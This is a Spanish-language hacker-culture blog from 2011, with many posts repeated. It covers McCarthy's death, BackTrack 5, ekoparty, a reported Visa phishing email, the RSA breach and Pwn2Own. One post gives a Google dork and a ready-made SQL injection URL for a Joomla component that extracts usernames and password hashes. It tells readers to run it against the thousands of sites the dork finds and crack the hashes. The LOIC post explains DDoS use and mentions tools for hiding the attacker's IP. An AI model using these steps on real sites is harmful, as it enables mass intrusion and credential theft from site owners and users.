lunes, 5 de diciembre de 2011
martes, 25 de octubre de 2011
Lisp está de luto
John McCarthy (1927-2011), Cientifico en Computación acuñó el término Inteligencia Artificial e inventó el Lenguaje de Programación Lisp, murió a la edad de 84 años y fue un legendario científico pionero en el campo de la IA.
El Lisp fue inventado por John McCarthy en 1958 mientras estaba en el Instituto Tecnológico de Massachusetts (MIT). McCarthy publicó su diseño en 1960 en un artículo de Communications of the ACM titulado "funciones recursivas de expresiones simbólicas y su cómputo por la máquina, parte I"[1] (la "parte II" nunca fue publicada). Allí mostró que con algunos operadores simples y una notación para las funciones, uno puede construir un lenguaje turing completo para los algoritmos.
El Lisp (o LISP) es una familia de lenguajes de programación de computadora de tipo multiparadigma con una larga historia y una sintaxis completamente entre paréntesis. Especificado originalmente en 1958 por John McCarthy y sus colaboradores en el Instituto Tecnológico de Massachusetts, el Lisp es el segundo más viejo lenguaje de programación de alto nivel de extenso uso hoy en día; solamente el FORTRAN es más viejo. Al igual que el FORTRAN, el Lisp ha cambiado mucho desde sus comienzos, y han existido un número de dialectos en su historia. Hoy, los dialectos Lisp de propósito general más ampliamente conocidos son el Common Lisp y el Scheme.
El nombre LISP deriva del "LISt Processing" (Proceso de LIStas). Las listas encadenadas son una de las estructuras de datos importantes del Lisp, y el código fuente del Lisp en sí mismo está compuesto de listas.
http://es.wikipedia.org/wiki/Lisp
Comentario: Nuestro más sincero homenaje desde sombrerosnegros ...Que la fuerza lo acompañe.
El Lisp fue inventado por John McCarthy en 1958 mientras estaba en el Instituto Tecnológico de Massachusetts (MIT). McCarthy publicó su diseño en 1960 en un artículo de Communications of the ACM titulado "funciones recursivas de expresiones simbólicas y su cómputo por la máquina, parte I"[1] (la "parte II" nunca fue publicada). Allí mostró que con algunos operadores simples y una notación para las funciones, uno puede construir un lenguaje turing completo para los algoritmos.
El Lisp (o LISP) es una familia de lenguajes de programación de computadora de tipo multiparadigma con una larga historia y una sintaxis completamente entre paréntesis. Especificado originalmente en 1958 por John McCarthy y sus colaboradores en el Instituto Tecnológico de Massachusetts, el Lisp es el segundo más viejo lenguaje de programación de alto nivel de extenso uso hoy en día; solamente el FORTRAN es más viejo. Al igual que el FORTRAN, el Lisp ha cambiado mucho desde sus comienzos, y han existido un número de dialectos en su historia. Hoy, los dialectos Lisp de propósito general más ampliamente conocidos son el Common Lisp y el Scheme.
El nombre LISP deriva del "LISt Processing" (Proceso de LIStas). Las listas encadenadas son una de las estructuras de datos importantes del Lisp, y el código fuente del Lisp en sí mismo está compuesto de listas.
http://es.wikipedia.org/wiki/Lisp
Comentario: Nuestro más sincero homenaje desde sombrerosnegros ...Que la fuerza lo acompañe.
Etiquetas:
cultura hacker,
ia,
inteligencia artificial,
lenguaje,
lisp,
mit,
programacion
viernes, 12 de agosto de 2011
EL CAMINO DEL MALWARE
Bueno lo prometido es deuda, aqui está la traducción del camino del malware.-
que lo disfruten y no se olviden de mencionar mi blog ;) .-
EAA
que lo disfruten y no se olviden de mencionar mi blog ;) .-
EAA
Etiquetas:
botmaster,
botnet,
gusano,
malware,
seguridad informatica,
spam,
traduccion,
troyano,
virus informatico
sábado, 6 de agosto de 2011
LOiC o como cañonear las naves...
Low Orbit Ion Cannon (abreviado LOIC) es una aplicación diseñada para realizar pruebas de resistencia a una red informática, desarrollada por «praetox» usando el lenguaje de programación C# (Existe también un fork en Cpp y qt llamado LOIQ). La aplicación realiza un ataque de denegación de servicio del objetivo enviando una gran cantidad de paquetes TCP, paquetes UDP o peticiones HTTP con objeto de determinar cuál es la cantidad de peticiones por segundo que puede resolver la red objetivo antes de dejar de funcionar.
Una modificaciòn del mismo de distribución gratuita permite realizar ataques DDOS de forma simple, se está dando a conocer a través del boca a boca. Tan fácil de utilizar como introducir la IP del objetivo y pulsar un botón. Eso sí, deja la IP del atacante al descubierto.
El DDoS (Distributed Denial of Service, Denegación de Servicio Distribuida) es un tipo de ataque informático consistente en el envío masivo de paquetes de información hacia una computadora (generalmente un servidor conectado a Internet) desde muchos sitios a la vez, de forma que las comunicaciones de esta se colapsen. Sería como mandar a centenares o miles de coches simultáneamente hacia el peaje de una autopista: la colapsaríamos en cuestión de minutos provocando largas retenciones. La máquina afectada deja de prestar servicio y es imposible acceder a ella, a las páginas web que aloja, al correo, etc.
Cuantas más personas o desde cuantas más máquinas se lance el ataque, mucho mejor, este es más efectivo. Es por ello que, por ejemplo, las redes criminales de crackers recurren a máquinas zombies para lanzar tales ataques contra las empresas a las que pretenden chantajear, cobrando una cantidad por no volver a hacerlo. Los grupos hacktivistas también emplean la misma técnica aunque de forma diferente, recurriendo al voluntariado de internautas afines a sus ideas en vez de a máquinas zombies*.
El LOIC tiene un pequeño-gran problema: no proporciona ninguna herramienta para camuflar la dirección IP del atacante, con lo que este puede ser detectado y tomadas las acciones legales pertinentes en consecuencia. La ocultación de identidad debe buscarse por otro lado, existiendo herramientas para ello.
Mas datos
http://hispanon.blogspot.com/p/aprende-usar-loic.html
http://es.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
Comentarios: Como dice Spiderman un gran poder necesita una gran dosis de reponsabilidad para usarlo.-Un gran poder conlleva una gran responsabilidad. Fuente: Amazing Fantasy #15
Una modificaciòn del mismo de distribución gratuita permite realizar ataques DDOS de forma simple, se está dando a conocer a través del boca a boca. Tan fácil de utilizar como introducir la IP del objetivo y pulsar un botón. Eso sí, deja la IP del atacante al descubierto.
El DDoS (Distributed Denial of Service, Denegación de Servicio Distribuida) es un tipo de ataque informático consistente en el envío masivo de paquetes de información hacia una computadora (generalmente un servidor conectado a Internet) desde muchos sitios a la vez, de forma que las comunicaciones de esta se colapsen. Sería como mandar a centenares o miles de coches simultáneamente hacia el peaje de una autopista: la colapsaríamos en cuestión de minutos provocando largas retenciones. La máquina afectada deja de prestar servicio y es imposible acceder a ella, a las páginas web que aloja, al correo, etc.
Cuantas más personas o desde cuantas más máquinas se lance el ataque, mucho mejor, este es más efectivo. Es por ello que, por ejemplo, las redes criminales de crackers recurren a máquinas zombies para lanzar tales ataques contra las empresas a las que pretenden chantajear, cobrando una cantidad por no volver a hacerlo. Los grupos hacktivistas también emplean la misma técnica aunque de forma diferente, recurriendo al voluntariado de internautas afines a sus ideas en vez de a máquinas zombies*.
El LOIC tiene un pequeño-gran problema: no proporciona ninguna herramienta para camuflar la dirección IP del atacante, con lo que este puede ser detectado y tomadas las acciones legales pertinentes en consecuencia. La ocultación de identidad debe buscarse por otro lado, existiendo herramientas para ello.
Mas datos
http://hispanon.blogspot.com/p/aprende-usar-loic.html
http://es.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
Comentarios: Como dice Spiderman un gran poder necesita una gran dosis de reponsabilidad para usarlo.-Un gran poder conlleva una gran responsabilidad. Fuente: Amazing Fantasy #15
Etiquetas:
cultura hacker,
hacker hacktivismo,
spiderman
martes, 17 de mayo de 2011
Backtrak 5 en el ruedo...
Ya esta disponible la Backtrack 5
Backtrack se trata de una de las distribuciones GNU/Linux de mayor popularidad en el mundo de la seguridad informática. Está desarrollada por profesionales de seguridad y está dirigida al análisis forense y "Penetration Testing".
Backtrack surgió como resultado de la fusión de dos grandes distribuciones orientadas a la seguridad. Por un lado "WHAX", distribución basada en Slax desarrollada por Mati Aharoni; y por otro lado "Auditor Security Collection", Live CD basada en Knoppix desarrollada por Max Moser.
BackTrack proporciona a los usuarios acceso a una colección completa de herramientas relacionadas con la seguridad que van desde scanners de puertos hasta herramienta de ingeniería inversa. Se encuentra disponible en Live CD lo que permite arrancar directamente desde un medio portable sin necesidad de instalación, aunque la instalación permanente en el disco duro también es posible.
BackTrack incluye muchas herramientas de seguridad bien conocidas organizándolas en categorías: Information Gathering, Network Mapping, Vulnerability Identification, Web Application Analysis, Privilege Escalation, Digital Forensics, Reverse Engineering, Voice Over IP, etc. Algunas de las herramientas más relevantes son:
•Metasploit
•SET (Social Engineer Toolkit)
•Kismet
•Nmap
•Ophcrack
•Ettercap
•Wireshark
•Hidra
link:http://www.backtrack-linux.org/
Podes descargarlo si sos miembro de la comunidad DragonJar aqui : http://www.dragonjar.org/backtrack-5.xhtml
Backtrack se trata de una de las distribuciones GNU/Linux de mayor popularidad en el mundo de la seguridad informática. Está desarrollada por profesionales de seguridad y está dirigida al análisis forense y "Penetration Testing".
BackTrack 5 - Penetration Testing Distribution from Offensive Security on Vimeo.
Backtrack surgió como resultado de la fusión de dos grandes distribuciones orientadas a la seguridad. Por un lado "WHAX", distribución basada en Slax desarrollada por Mati Aharoni; y por otro lado "Auditor Security Collection", Live CD basada en Knoppix desarrollada por Max Moser.
BackTrack proporciona a los usuarios acceso a una colección completa de herramientas relacionadas con la seguridad que van desde scanners de puertos hasta herramienta de ingeniería inversa. Se encuentra disponible en Live CD lo que permite arrancar directamente desde un medio portable sin necesidad de instalación, aunque la instalación permanente en el disco duro también es posible.
BackTrack incluye muchas herramientas de seguridad bien conocidas organizándolas en categorías: Information Gathering, Network Mapping, Vulnerability Identification, Web Application Analysis, Privilege Escalation, Digital Forensics, Reverse Engineering, Voice Over IP, etc. Algunas de las herramientas más relevantes son:
•Metasploit
•SET (Social Engineer Toolkit)
•Kismet
•Nmap
•Ophcrack
•Ettercap
•Wireshark
•Hidra
link:http://www.backtrack-linux.org/
Podes descargarlo si sos miembro de la comunidad DragonJar aqui : http://www.dragonjar.org/backtrack-5.xhtml
Etiquetas:
backtrak,
comunidad,
cultura hacker,
ethical hacking,
hacking,
linux,
penetration testing,
seguridad informatica
sábado, 30 de abril de 2011
ekoparty Security Conference Argentina edición 2011
Fechas confirmadas directamente de la fuente
Francisco Amato Apr 15 06:51PM -0300 ^
Hola a todos!
Queríamos contarles que están confirmadas las fechas de la ekoparty 2011.Este año la conferencia sera el 21, 22, 23 de Septiembre..... Si, 3 días de conferencia :)
En los próximos días vamos a estar comentando las novedades!!
Los esperamos!
--
Francisco Amato
http://www.linkedin.com/in/famato
http://twitter.com/famato
[ISR] - Infobyte Security Research
Chile 1441 - Segundo Cuerpo - Primer Piso
[C1098ABC] Buenos Aires - Argentina
Tel: +54 11 43837000
http://www.infobytesec.com
http://blog.infobytesec.com
La ekoparty se realiza anualmente en la Ciudad Autónoma de Buenos Aires en donde asistentes, invitados, especialistas y referentes de todo el mundo tienen la oportunidad de involucrarse con innovación tecnológica, vulnerabilidades y herramientas en un ambiente distendido y de intercambio de conocimientos.
“La Conferencia de Seguridad Informática más importante de América Latina.” La idea de realizar un evento con estas particularidades surgió en el circuito underground de IT, pero con el transcurso de las ediciones, logró posicionarse como la conferencia técnica de seguridad mas grande de Latinoamérica. Además de poseer relevancia internacional y contar con una amplia audencia técnica especializada, la ekoparty ofrece entrenamientos, con los profesionales más reconocidos del mercado, actividades paralelas y desafíos.
Organizadores
JUAN PABLO D. BORGNA
Organizador fundador de ekoparty. Propietario de E-MIPS.
LEONARDO PIGNER
Organizador fundador de ekoparty. Propietario de Base4 Security.
FEDERICO KIRSCHBAUM
Organizador fundador de ekoparty. Propietario de Infobyte.
JERÓNIMO BASALDÚA
Organizador fundador de ekoparty. Propietario de Base4 Security.
FRANCISCO AMATO
Organizador fundador de ekoparty. Propietario de Infobyte
“Reunirse y disfrutar de los descubrimientos más importantes en seguridad informática.”
ekoparty Security Conference permite a consultores, oficiales de seguridad, investigadores, programadores, técnicos, administradores de sistemas, nerds y entusiastas de la tecnología, reunirse y disfrutar de los descubrimientos más importantes en seguridad informática.
¿Por quÉ distintos?
Además de brindar un espacio único para el intercambio de conocimientos, la ekoparty provee una serie de actividades, dinámicas y distendidas, relacionadas a lo lúdico y la seguridad informática.
Desafío de Lockpicking;
Wardriving en Buenos Aires;
Wargames;
Zona de relax;
Exposición y actividades relacionadas con el arte digital;
Tiempo para GetTogether;
Promoción de la red Social.
Como ekoparty se caracteriza por sus conferencias y ambiente relajado, brindamos a los asistentes el GetTogether, luego de la primera jornada y un AfterCon Party de cierre al terminar la semana
link: www.ekoparty.org ;)
Comentario: Por donde se puede pasar a buscar la entrada full-free?
Francisco Amato Apr 15 06:51PM -0300 ^
Hola a todos!
Queríamos contarles que están confirmadas las fechas de la ekoparty 2011.Este año la conferencia sera el 21, 22, 23 de Septiembre..... Si, 3 días de conferencia :)
En los próximos días vamos a estar comentando las novedades!!
Los esperamos!
--
Francisco Amato
http://www.linkedin.com/in/famato
http://twitter.com/famato
[ISR] - Infobyte Security Research
Chile 1441 - Segundo Cuerpo - Primer Piso
[C1098ABC] Buenos Aires - Argentina
Tel: +54 11 43837000
http://www.infobytesec.com
http://blog.infobytesec.com
La ekoparty se realiza anualmente en la Ciudad Autónoma de Buenos Aires en donde asistentes, invitados, especialistas y referentes de todo el mundo tienen la oportunidad de involucrarse con innovación tecnológica, vulnerabilidades y herramientas en un ambiente distendido y de intercambio de conocimientos.
“La Conferencia de Seguridad Informática más importante de América Latina.” La idea de realizar un evento con estas particularidades surgió en el circuito underground de IT, pero con el transcurso de las ediciones, logró posicionarse como la conferencia técnica de seguridad mas grande de Latinoamérica. Además de poseer relevancia internacional y contar con una amplia audencia técnica especializada, la ekoparty ofrece entrenamientos, con los profesionales más reconocidos del mercado, actividades paralelas y desafíos.
Organizadores
JUAN PABLO D. BORGNA
Organizador fundador de ekoparty. Propietario de E-MIPS.
LEONARDO PIGNER
Organizador fundador de ekoparty. Propietario de Base4 Security.
FEDERICO KIRSCHBAUM
Organizador fundador de ekoparty. Propietario de Infobyte.
JERÓNIMO BASALDÚA
Organizador fundador de ekoparty. Propietario de Base4 Security.
FRANCISCO AMATO
Organizador fundador de ekoparty. Propietario de Infobyte
“Reunirse y disfrutar de los descubrimientos más importantes en seguridad informática.”
ekoparty Security Conference permite a consultores, oficiales de seguridad, investigadores, programadores, técnicos, administradores de sistemas, nerds y entusiastas de la tecnología, reunirse y disfrutar de los descubrimientos más importantes en seguridad informática.
¿Por quÉ distintos?
Además de brindar un espacio único para el intercambio de conocimientos, la ekoparty provee una serie de actividades, dinámicas y distendidas, relacionadas a lo lúdico y la seguridad informática.
Desafío de Lockpicking;
Wardriving en Buenos Aires;
Wargames;
Zona de relax;
Exposición y actividades relacionadas con el arte digital;
Tiempo para GetTogether;
Promoción de la red Social.
Como ekoparty se caracteriza por sus conferencias y ambiente relajado, brindamos a los asistentes el GetTogether, luego de la primera jornada y un AfterCon Party de cierre al terminar la semana
link: www.ekoparty.org ;)
Comentario: Por donde se puede pasar a buscar la entrada full-free?
Etiquetas:
conference,
conferencia,
cultura hacker,
ekoparty,
hacker hacktivismo,
hackers,
hacking,
lockpicking,
security,
wardriving
miércoles, 27 de abril de 2011
Tipea con la velocidad de un Hacker
Alguna vez se preguntaron como hacen los "hackers" de las peliculas para tipear tan rápido y no equivocarse jamás (nunca borran) ...la respuesta esta aqui
hackertyper.net
Y nada tendrás que envidiarle ni a Neo ni a Trinity ni al flaco de Swordfish ;)
hackertyper.net
Y nada tendrás que envidiarle ni a Neo ni a Trinity ni al flaco de Swordfish ;)
Etiquetas:
cultura hacker,
friki,
seguridad informatica,
toolz
martes, 12 de abril de 2011
Nuevo caso de Phishing de Visa y van...
Hoy entre toda la basura de correo que recibo diariamente, me llamó la atención uno de la tarjeta VISA, (seguro es un caso de phishing me dije yo), luego de analizar los vinculos de las imagenes , etc, parecia de lo mas creible ...hasta que realicé la prueba de fuego, abrir el mail y pasar con el puntero del mouse encima del link sugerido y voilá apareció lo que me temía...la direccion IP a la que apunta el link con el contenido del formulario falso...
por lo que decidi enviarlo al sitio del amigo Cristian Borghello para su archivo y denuncia
a: phishing@segu-info.com.ar
El diseño es muy parecido al de Visa Home pero en realidad se trata de una página diseñada para robar la información. El atacante solicita las credenciales de acceso al portal y los datos de la tarjeta, titular, número, fecha de expiración y códigos de seguridad.
Al hacer clic para acceder se muestra un mensaje de error y luego la víctima es redireccionada al sitio real de Visa Home para realizar el logueo nuevamente. En este punto sus datos ya se encuentran en manos del atacante.-
El sitio real de Visa Home Argentina es: https://inetserv.visa.com.ar/vhs/app/Login.po
Este tipo de ataques, suelen engañar a muchos usuarios. Detectarlos no es complicado.
En primer lugar hay que tener en cuenta que Visa no envía esta clase de mensajes ni solicita información por correo. En cualquier caso, ante la duda lo ideal es llamar al banco.
El texto del mensaje es
Titulo: Aviso
Remitente: Visa Argentina
Visa Home esta constantemente trabajando para su seguridad,
hemos notado una serie de irregularidades en su cuenta en
los últimos días y tuvimos que suspender el acceso a su cuenta temporalmente,
para reactivar su cuenta por favor dirijase a https://inetserv.visa.com.ar/vhs/app/Login.po (Página web falsa exactamente igual a la de Visa)
Y llene los campos necesarios, esto hará que restablezcamos
su cuenta lo antes posible.
Lamentamos las molestias.
Merlina Irigotia,
Departamento Legales,
Visa Argentina.
Comentarios...que se puede decir, cada vez hay mas que quieren obtener dinero de los que lo ganan honestamente...por lo consiguiente hay menos que lo ganan honestamente...
por lo que decidi enviarlo al sitio del amigo Cristian Borghello para su archivo y denuncia
a: phishing@segu-info.com.ar
El diseño es muy parecido al de Visa Home pero en realidad se trata de una página diseñada para robar la información. El atacante solicita las credenciales de acceso al portal y los datos de la tarjeta, titular, número, fecha de expiración y códigos de seguridad.
Al hacer clic para acceder se muestra un mensaje de error y luego la víctima es redireccionada al sitio real de Visa Home para realizar el logueo nuevamente. En este punto sus datos ya se encuentran en manos del atacante.-
El sitio real de Visa Home Argentina es: https://inetserv.visa.com.ar/vhs/app/Login.po
Este tipo de ataques, suelen engañar a muchos usuarios. Detectarlos no es complicado.
En primer lugar hay que tener en cuenta que Visa no envía esta clase de mensajes ni solicita información por correo. En cualquier caso, ante la duda lo ideal es llamar al banco.
El texto del mensaje es
Titulo: Aviso
Remitente: Visa Argentina
Visa Home esta constantemente trabajando para su seguridad,
hemos notado una serie de irregularidades en su cuenta en
los últimos días y tuvimos que suspender el acceso a su cuenta temporalmente,
para reactivar su cuenta por favor dirijase a https://inetserv.visa.com.ar/vhs/app/Login.po (Página web falsa exactamente igual a la de Visa)
Y llene los campos necesarios, esto hará que restablezcamos
su cuenta lo antes posible.
Lamentamos las molestias.
Merlina Irigotia,
Departamento Legales,
Visa Argentina.
Comentarios...que se puede decir, cada vez hay mas que quieren obtener dinero de los que lo ganan honestamente...por lo consiguiente hay menos que lo ganan honestamente...
miércoles, 30 de marzo de 2011
sábado, 19 de marzo de 2011
Sql INjection en Joomla!
Se ha publicado una vulnerabilidad de inyección SQL que afecta a la rama 1.6.0 del popular gestor de contenidos Joomla. El fallo ha sido descubierto por Aung Khant que forma parte de 'YGN Ethical Hacker Group'.
Joomla es un popular gestor de contenidos en código abierto, que cuenta con una gran cantidad de plantillas y componentes que un usuario puedo utilizar para implementar de manera rápida una aplicación web. Estos componentes son programados por todo tipo de desarrolladores. Este hecho, unido a su popularidad, convierten al gestor de contenidos en un objetivo muy popular para que los atacantes.
El fallo fue puesto en conocimiento de Joomla el pasado 24 de enero y tuvo que esperar hasta principios de marzo para que fuera publicada una actualización que solucionase este fallo de seguridad, concretamente la versión 1.6.1. El grupo ha esperado una semana desde la publicación de la actualización para hacer público el fallo, dando este plazo para que los usuarios lleven a cabo la actualización del mismo.
Se ha reportado un nuevo fallo en un componente de joomla, precisamente en com_productshowcase:
DORKS 1 : allinurl:"com_productshowcase"
EXPLOIT :index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
Tan simple como eso.... ponemos en google la Dork y econtraremos más de 2500 sitios vulnerables. Entonces simplemente nos queda: http:sitiovulnerable.com/EXPLOIT
Luego desencriptamos los passwords con algúnn cracker MD5 de esos que andan por la red... (por ejemplo http://gdataonline.com/seekhash.php
fuente
Tutorial en http://rincondetodo.mforos.com/1783698/9018427-tutorial-inyeccion-sql-en-joomla/
Comentario: Usarlo solo con fines experimentales, El autor del blog no se hace responsable por la interpretación de la información expuesta en el Sitio, ni de su uso indebido, o sea practiquen pero no rompan.- ;)
Joomla es un popular gestor de contenidos en código abierto, que cuenta con una gran cantidad de plantillas y componentes que un usuario puedo utilizar para implementar de manera rápida una aplicación web. Estos componentes son programados por todo tipo de desarrolladores. Este hecho, unido a su popularidad, convierten al gestor de contenidos en un objetivo muy popular para que los atacantes.
El fallo fue puesto en conocimiento de Joomla el pasado 24 de enero y tuvo que esperar hasta principios de marzo para que fuera publicada una actualización que solucionase este fallo de seguridad, concretamente la versión 1.6.1. El grupo ha esperado una semana desde la publicación de la actualización para hacer público el fallo, dando este plazo para que los usuarios lleven a cabo la actualización del mismo.
Se ha reportado un nuevo fallo en un componente de joomla, precisamente en com_productshowcase:
DORKS 1 : allinurl:"com_productshowcase"
EXPLOIT :index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
Tan simple como eso.... ponemos en google la Dork y econtraremos más de 2500 sitios vulnerables. Entonces simplemente nos queda: http:sitiovulnerable.com/EXPLOIT
Luego desencriptamos los passwords con algúnn cracker MD5 de esos que andan por la red... (por ejemplo http://gdataonline.com/seekhash.php
fuente
Tutorial en http://rincondetodo.mforos.com/1783698/9018427-tutorial-inyeccion-sql-en-joomla/
Comentario: Usarlo solo con fines experimentales, El autor del blog no se hace responsable por la interpretación de la información expuesta en el Sitio, ni de su uso indebido, o sea practiquen pero no rompan.- ;)
Etiquetas:
hacking,
inyeccion de sql,
joomla,
seguridad informatica
Hackearon a RSA
La división de seguridad de EMC, RSA, fué comprometida en su seguridad.
Art Coviello, director ejecutivo de RSA, explica en una carta abierta a los clientes de la compañía que sus sistemas de seguridad "identificaron un ciberataque extremadamente sofisticado en progreso" contra RSA. Tras tomar "una variedad de medidas agresivas contra la amenaza", comenzaron "una investigación exhaustiva del ataque". Además, Coviello asegura que están trabajando "con las autoridades apropiadas".
Esta investigación les ha llevado a la conclusión de que el ataque fue una Amenaza Avanzada Persistente. Asimismo, descubrieron que cierta información había sido sustraida.
Parte de la información robada está "específicamente relacionada" con los protocolos de autentificación SecurID de la empresa. Este sistema de seguridad se basa en una doble autentificación. Por un lado, se utiliza una contraseña que conoce el usuario y, por otro lado, una 'llave, un autentificador físico que proporciona una nueva contraseña que se cambia "cada 60 segundos".
Coviello también explica que no tienen pruebas de que ningún otro producto, tanto de RSA como de EMC, haya sido afectado por el ataque. Asimismo, no cree que se haya visto comprometida la información de ningún cliente o trabajador como resultado del ataque.
"Nuestra prioridad es garantizar la seguridad de los clientes y su confianza". Para ello, utilizarán "todos los recursos necesarios" para proporcionar a sus clientes las "herramientas, procesos y soporte" que necesiten para fortalecer la seguridad de sus sistemas.
Según explica Whitfield Diffie, especialista en seguridad informática, al New York Times, la 'master key o llave maestra', un número utilizado en el algoritmo de encriptación, podría haber sido robado.
Si este hubiera sido el caso, explica Diffie, podría utilizarse el código para duplicar las tarjetas y llaves que proporciona RSA, de modo que se podría obtener acceso a las redes y los sistemas informáticos de las empresas.
Comentarios: Si hubiese sido o no el caso es lo mismo, desde el mimo momento en que la empresa fué victima de un ataque, yo creo que ya se plantó la duda acerca de su efectividad como referencia en seguridad, al margen de esto , no debe confundirse este ciberataque a la division RSA con el sistema criptografico de clave pública RSA que lleva su nombre por sus creadores (Rivest, Shamir y Adleman) mas info acerca de este mismo en http://es.wikipedia.org/wiki/RSA .-
Art Coviello, director ejecutivo de RSA, explica en una carta abierta a los clientes de la compañía que sus sistemas de seguridad "identificaron un ciberataque extremadamente sofisticado en progreso" contra RSA. Tras tomar "una variedad de medidas agresivas contra la amenaza", comenzaron "una investigación exhaustiva del ataque". Además, Coviello asegura que están trabajando "con las autoridades apropiadas".
Esta investigación les ha llevado a la conclusión de que el ataque fue una Amenaza Avanzada Persistente. Asimismo, descubrieron que cierta información había sido sustraida.
Parte de la información robada está "específicamente relacionada" con los protocolos de autentificación SecurID de la empresa. Este sistema de seguridad se basa en una doble autentificación. Por un lado, se utiliza una contraseña que conoce el usuario y, por otro lado, una 'llave, un autentificador físico que proporciona una nueva contraseña que se cambia "cada 60 segundos".
Coviello también explica que no tienen pruebas de que ningún otro producto, tanto de RSA como de EMC, haya sido afectado por el ataque. Asimismo, no cree que se haya visto comprometida la información de ningún cliente o trabajador como resultado del ataque.
"Nuestra prioridad es garantizar la seguridad de los clientes y su confianza". Para ello, utilizarán "todos los recursos necesarios" para proporcionar a sus clientes las "herramientas, procesos y soporte" que necesiten para fortalecer la seguridad de sus sistemas.
Según explica Whitfield Diffie, especialista en seguridad informática, al New York Times, la 'master key o llave maestra', un número utilizado en el algoritmo de encriptación, podría haber sido robado.
Si este hubiera sido el caso, explica Diffie, podría utilizarse el código para duplicar las tarjetas y llaves que proporciona RSA, de modo que se podría obtener acceso a las redes y los sistemas informáticos de las empresas.
Comentarios: Si hubiese sido o no el caso es lo mismo, desde el mimo momento en que la empresa fué victima de un ataque, yo creo que ya se plantó la duda acerca de su efectividad como referencia en seguridad, al margen de esto , no debe confundirse este ciberataque a la division RSA con el sistema criptografico de clave pública RSA que lleva su nombre por sus creadores (Rivest, Shamir y Adleman) mas info acerca de este mismo en http://es.wikipedia.org/wiki/RSA .-
Etiquetas:
hackers,
RSA,
securID,
seguridad informatica
viernes, 11 de marzo de 2011
Pwn2Own primer día: Internet Explorer 8 y Safari hackeados
Tiene lugar por estos momentos la CanSecWest en Vancouver (Canadá), una conferencia mas de seguridad de las tantas que hay, igual? No, porque en esta conferencia en particular esta el Pwn2Own, el cual es una competición en la cual los participantes deben "hackear" determinadas aplicaciones, explotando algunas vulnerabilidades de las mismas y en caso de tener exito enviar un informe completo al fabricante para que puede ser parcheado en las proximas versiones, en este año 2011 los actores principales son los navegadores con la salvedad que Google ofrecio un premio al que lograse vulnerar a su naveghador estrella Chrome, si bien hace poco Google lanzo una actualizacion de seguridad para el mismo que corrige 24 vulnerabilidades, se espera que tambien Chrome sea una victima mas del ingenio de los participantes, por ahora ya han caido Internet Explorer 8 corriendo sobre un windows 7 con SP1 y Safari 5.0.3 sobre Mac OS X 10.6.6 .
La firma francesa de seguridad VUPEN que fue la primera en atacar y, en cinco segundos de exposición del navegador a una página cargada de código malicioso, logró ejecutar la calculadora y escribir un archivo en el disco duro del equipo.La siguió Stephen Fewer de Harmony Security que logró ejecutar la calculadora de Windows y escribir en el disco duro del equipo, mediante un ataque que, según este experto en seguridad, tardó cinco semanas en modelar y que explotaba, de manera conjunta, tres vulnerabilidades del navegador.
Hoy la competición se centrará en Firefox y los smartphones (iOS, Android, BlackBerry OS y Windows Phone 7).
Comentario: Yo probé la nueva versión de Chrome, lo que no me gustó fué que me avisó el sistema después que ya estaba instalada en mi equipo, y no antes, es decir "se tomo el atrevimiento" de hacerlo, debo revisar mis configuraciones de seguridad, y si no hubiese sido Chrome? Y si en cambio un troyano? Ojo.-
La firma francesa de seguridad VUPEN que fue la primera en atacar y, en cinco segundos de exposición del navegador a una página cargada de código malicioso, logró ejecutar la calculadora y escribir un archivo en el disco duro del equipo.La siguió Stephen Fewer de Harmony Security que logró ejecutar la calculadora de Windows y escribir en el disco duro del equipo, mediante un ataque que, según este experto en seguridad, tardó cinco semanas en modelar y que explotaba, de manera conjunta, tres vulnerabilidades del navegador.
Hoy la competición se centrará en Firefox y los smartphones (iOS, Android, BlackBerry OS y Windows Phone 7).
Comentario: Yo probé la nueva versión de Chrome, lo que no me gustó fué que me avisó el sistema después que ya estaba instalada en mi equipo, y no antes, es decir "se tomo el atrevimiento" de hacerlo, debo revisar mis configuraciones de seguridad, y si no hubiese sido Chrome? Y si en cambio un troyano? Ojo.-
Etiquetas:
chrome,
competencia,
explorer,
safari,
seguridad informatica
martes, 8 de febrero de 2011
Conferencia de Pekka Himanen
Tercera jornada del ciclo "Entendiendo los cambios. Ideas, libros y autores en Fundación Telefónica". Pekka Himanen: La Ética del Hacker: ¿Cuál es la nueva cultura de la creatividad necesaria para el futuro?
10 de febrero a las 12:00 horas en el Salón de Actos de Fundación Telefónica en Madrid (Gran Vía 28, planta 2).
El evento podrá seguirse en directo por Internet (ver abajo)
En esta ocasión, la periodista Mamen Mendizábal, presentadora de informativos de la cadena de televisión LaSexta, moderará el evento.
Pekka Himanen es un filósofo finlandés, doctor por la Universidad de Helsinki, que ha trabajado como investigador en Finlandia, Inglaterra y en las universidades norteamericanas de Stanford y Berkeley. Asimismo, ha sido asesor en temas sobre la sociedad de la información en los distintos gobiernos finlandeses y es muy conocido en el mundo de la cultura por sus relaciones con los artistas más vanguardistas y los medios de comunicación.
Himanen ha plasmado sus ideas en su obra más conocida, La ética del hacker y el espíritu de la era de la información (2001), en la que desarrolla los fundamentos y consecuencias de la “ética hacker”.
Se trata de una nueva ética surgida en las comunidades virtuales o cibercomunidades, y aplicada hoy en día en todo tipo de comunidades. La expresión fue acuñada en los años 80 del siglo pasado por Steven Levy, y engloba los principios morales que surgieron a finales de los años cincuenta en el Laboratorio de Inteligencia Artificial del MIT y, en general, en la cultura de los aficionados a la informática de los años sesenta y setenta. De aquellos principios, que se resumen en el acceso libre a la información y en que la informática puede mejorar la calidad de vida de las personas, es heredero y principal representante actual nuestro ponente.
La ética del trabajo para el hacker se funda en el valor de la creatividad, y consiste en combinar la pasión con la libertad. El dinero deja de ser un valor en sí mismo y el beneficio se cifra en metas como el valor social y el libre acceso, la transparencia y la franqueza.
Himanen también es autor de El Estado del bienestar y la sociedad de la información: El modelo finlandés (2002), obra que comparte en autoría con el sociólogo Manuel Castells. Recientemente ha publicado "The Culture of Creativity".
Seguir el evento onlineLa conferencia se puede seguir EN DIRECTO desde esta página y a través de nuestra cuenta de Twitter: @fundacionTef con el hastag (etiqueta): #ftHimanen
